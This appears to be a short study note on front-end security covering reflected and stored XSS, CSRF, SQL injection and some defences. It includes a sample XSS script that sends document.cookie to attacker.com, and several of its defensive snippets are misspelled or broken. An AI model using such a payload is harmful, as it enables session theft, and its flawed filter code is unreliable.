front-end security

无限月读K
41 阅读1分钟

1. xss (cross site scripts)

1.1 principla

  1. attackers inject vacious script to the page

reflect xss

pricipal

  1. inject script to url param
  2. run after click link

condition example

  1. set url as html without any filter

storage xss

principal

  1. store xss into the web database
  2. when user visit the page, inject vasious code to the page.

condition example

  1. input vasious code in page input component as comment or other
  2. run when show comment

vasious code example

<script>
var cookie = document.cookie;
var xhr = new XMLHttpRequest();
var url = `https://www.attacker.com?usercookie=${cooke};
xhr.open('GET', url); 
xhr.send();
</script>

difference between storage xss and reflect xss

  1. reflect xss need new url each new attack
  2. storage xss can use forever just one inject

vulnerable which can be used to xss

  1. lack of input check
  2. lack of output filter

messure to protect xss

filter input

  1. filter not number or letter
str.replace(/^[\w\s]/gi,'')
  1. transform output letter
> &gt < &lt
  1. transform special letter in js string
add \\ before special letter

str.replace method

  1. the secone param can be a function
  2. and the param function can accept the match letter in str
str.replace(//gi,function(match){
switch(match){
case '': return ''
}
})

URL encode

return encodeURI(url)/encodeURLComponent(url)

use HttpOnly cookie

  1. setCookie value add HttpOnly means can only read cookie in server
'Set-Cookie':'mycookie = value; HttpOnly'

set CSP

  1. add http-euqiv = 'Content-Security-Policy' attribute in meta
  2. default-src ; selfmeans can only send request to the same origin
<meta http-equiv = 'Content-Secuirty-Policy' content = 'default-src 'self''

2. CSFR

  1. cross site request forgery
  2. pertend user requset

pricipal

  1. use the vulnerability of same origin policy in broswer
  2. easy request such as <img> <form>, broswer will auto take cookie, and broswer will not check wether the same origin or not
  3. so the vasious request take the cookie and get permit

how to protect

  1. use origin or referer in request header to judge if the allow orgin or not
  2. add a token when submit the form
  3. ban other cookie add SameSite = Strick in cookie header
  4. secone sure, such as input reassure code.

SQL inject

defination

  1. inject sql code into the input component
  2. run the vasious code to visit database
avatar
文章
阅读
粉丝